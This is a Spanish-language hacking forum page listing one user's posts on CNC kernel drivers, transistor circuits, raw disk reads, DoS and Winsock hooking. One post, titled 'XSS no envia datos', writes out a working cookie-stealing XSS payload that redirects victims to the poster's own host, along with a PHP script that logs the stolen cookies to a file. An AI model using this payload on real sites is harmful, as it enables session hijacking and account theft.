elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Temas
Páginas: [1]
1  Programación / Programación C/C++ / Duda con modo kernel y CNC en: 21 Agosto 2012, 23:43 pm
Hola, mi duda es la siguiente, para controlar una máquina frezadora a contról numérico, utilizo el mach3 un programa que hace de interfaz entre el usuario y la frezadora (conectada al puerto paralelo de la computadora).

Mach3 usa un driver para controlar el puerto paralelo, estoy investigando porqué porque estoy intentando hacer un soft similar pero simplificado. Quiero saber cuales son las ventajas del modo kernel. Pero ya se me acabaron las palabras para google.

Esto es lo que dice en el manual del mach3:

Citar
Mach3 debe ser capaz de enviar muy exactamente las señales de control a los ejes de la máquinaherramienta.
Windows carga y ejecuta programas normales de usuario cuando no tiene nada mejor para
hacerse. Así Mach3 no es un "programa normal de usuario"; éste debe estar al nivel más bajo dentro
Windows (esto es el manejo de interrupciones). Además para hacer esto se requiere posiblemente alta
velocidad (cada eje puede requerir atención 45.000 veces por segundo), el driver necesita sintonizar su
propio código. Windows no permite esto (este es un truco que juegan los virus) así ello se tiene que
solicitar un permiso especial. Este proceso requiere los reinicios de PC. Así si usted no ha realizado los
reinicios solicitados entonces Windows puede presentar la pantalla azul de muerte y el driver puede ser
corrompido. La única salida de esto será desinstalar manualmente el driver

Me gustaria saber si alguien me pudiera expandir un poco mas detalladamente esta expicación. Encuentro solo información de como programar drivers, que me va a resultar util, pero también quiero saber porque en este caso resulta necesario programar un driver ¿Si la computadora se relentiza por algún motivo, el driver sigue ejecutandose con la misma velocidad?¿Tiene acceso al timer de un modo diferente?¿Puede trabajar mas rápido?¿o mas constantemente?¿Por qué?

Bueno Muchas gracias por haber leido hasta el final  ;D espero una mano porque estoy medio estancado

Ah algo más:

Citar
http://2004.encuentrolinux.cl/docs/presentaciones/pdf/presentacion-cduclos.pdf


La programación en modo Kernel debiera utilizarse
en situaciones donde el rendimiento es crítico y en
aquellas situaciones donde se requiere acceso a
hardware que no es accesible a las aplicaciones de
usuario.
La programación en modo Kernel no sirve para
todas las situaciones


Desventajas:
● Los recursos disponibles en modo Kernel son por
lo general muy limitados
● Ausencia de printf (Cuidado con el uso de printk)
● No hay aritmética de punto flotante
● El flujo del tiempo no es lineal

2  Informática / Electrónica / Una duda elemental con transistor en: 14 Enero 2012, 03:22 am
Estoy haciendo un driver para un motor paso a paso, vi muchos puentes H con resistencias de 2k2 en la base del transistor. Sucede que tengo que alimentar las bobinas con casi 3A y se me da por hacer un cálculo que no me resulta muy feliz. No se si está bien. Acá dejo una imagen del circuito con la duda. La resistencia que me dá es muy baja 66,66 ohms. (en el circuito falta un diodo entre el colector y el emisor porque la carga es inductiva) Alguien me podria decir si el cálculo es correcto?




http://www.subirimagenes.com/otros-dudatransistor-7329721.html
3  Programación / Programación C/C++ / Apis para leer disco en forma RAW y acceder a archivos eliminados en: 24 Junio 2011, 22:28 pm
Esta es mi duda hace un tiempo que estoy buscando y no termino de dar en el clavo. Hasta donde se los archivos no desaparecen por completo de un disco cuando son eliminados. Quiero acceder al disco en forma RAW para buscar archivos eliminados. No quiero un programa para hacerlo, quiero programarlo yo. Se que con el api CreateFile() se puede acceder a una unidad de disco, después estoy dando vueltas y no termino de leer nada del disco. Busco info sobre DeviceIOControl() pero no me termina siendo clara y hay muchas constantes para las que no encuentro los valores numericos ni muchos ejemplos de codigo (eso seria lo mejor) después creo haber visto y perdido un ejemplo donde utilizaba las mismas funciones para leer un fichero pero con el disco. En fin un ejemplo seria lo mejor pero una ayuda cualquiera sea no seria despreciada. Gracias.
4  Seguridad Informática / Nivel Web / XSS no envia datos en: 27 Febrero 2009, 20:40 pm
uso el siguiente codigo:

Código:
<script>document.location='http://mipagina.com/archivo.php?x='+document.cookie;</script>


donde archivo.php contiene lo siguiente:

Código:
   1.
      <?php
   2.
      $fp = fopen("datos.txt", "a+");
   3.
      $cookie = $_GET['x'];
   4.
      $salto = "\n-----------------------------\n";
   5.
      fwrite($fp,$salto);
   6.
      fwrite($fp,$cookie);
   7.
      fclose($fp);
   8.
      ?>

Pero si el archivo php está hospedado en un servidor funciona y en otro no. En el que no funciona le di todos los permisos a la carpeta (777) y a los archivos que contiene para que pueda almacenar los datos, pero solo guarda la linea punteada "$salto", porqué puede suceder esto?

cuando la pagina vulnerable se redirecciona, en la url se ve todo el contenido de la cookie por document.cookie, pero estos datos no son tomados para ser escritos
5  Foros Generales / Sugerencias y dudas sobre el Foro / google y DoS en: 2 Enero 2009, 08:47 am
Porque a la pagina del hacker.net la afectó el virus bush que hacia peticiones para provocar una denegación de servicio y a paginas como google que las visitan desde todo el mundo todo el tiempo no les pasa nada?
6  Programación / Programación Visual Basic / hookear un browser en vb en: 25 Septiembre 2008, 11:58 am
Mi duda es la siguiente: con eiframe.dll se pude hacer un sencillo browser en VB, yo quisiera poder manipular las cabeceras http, para esto pense en hacer un proxy y manipularas ahi, pero si pudiera hookear la funcion send de winsock solamente en el browser que programe seria mejor, porque no estaria usando tantos sockets abiertos. Qisiera saber si es posible, hacerlo solo sobre este programa o si tendria que hookear la funcion en la libreria ws2_2.dll y luego separar los paquetes q me interesan.

Gracias por leer.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines